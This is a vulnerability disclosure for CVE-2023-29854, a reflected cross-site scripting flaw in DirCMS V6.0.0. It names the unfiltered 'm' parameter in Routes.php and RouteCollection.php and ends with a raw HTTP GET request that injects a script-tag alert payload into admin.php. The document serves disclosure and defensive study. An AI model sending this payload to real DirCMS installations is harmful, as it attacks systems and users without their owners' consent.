CVE-2023-29854: Vulnerabilitys/DirCMS_V6.0.0_XSS_vulnerability.md at main · secflag/Vulnerabilitys

DirCMS V6.0.0 has an XSS vulnerability in the foreground****Vulnerability description

DirCMS content management system is a powerful yet compact content management system based on PHP+Mysql architecture. DirCMS codes are all open source, which is convenient for users to develop or customize again; and adopts simple template label technology to make template creation easier. Under normal circumstances, it only takes half a day to build an enterprise website with DirCMS, which truly realizes the simplicity of functions. , practical, powerful and flexible. Can be widely used in the construction of various portal stations, download stations, enterprise stations, studios and other sites. DirCMS has accumulated tens of thousands of user groups since its release until the beginning of 2011, and has gained a good reputation. There is an XSS vulnerability in the foreground of DirCMS V6.0.0. Program download address: https://gitee.com/greenlaw/dircms6 Vulnerability URL /dircms/Core/Config/Routes.php parameter filtering is not strict, there is an XSS vulnerability.

Vulnerability analysis

In line 74 of the file /dircms/Core/Config/Routes.php, the parameters submitted by the client are received and saved in the variable m

Then call the setDefaultMethod function in the /dircms/System/Router/RouteCollection.php file for processing

In this method, the data input by the user is not filtered and output as it is, and there is an XSS vulnerability.

Vulnerability verification

GET /admin.php?c=module_search&dir=22222&m=show_indexqdspk<script>alert(1)</script>dx3bt HTTP/1.1
Host: 10.10.10.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh
Referer: http://10.10.10.1/admin.php?c=home&m=home
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Connection: close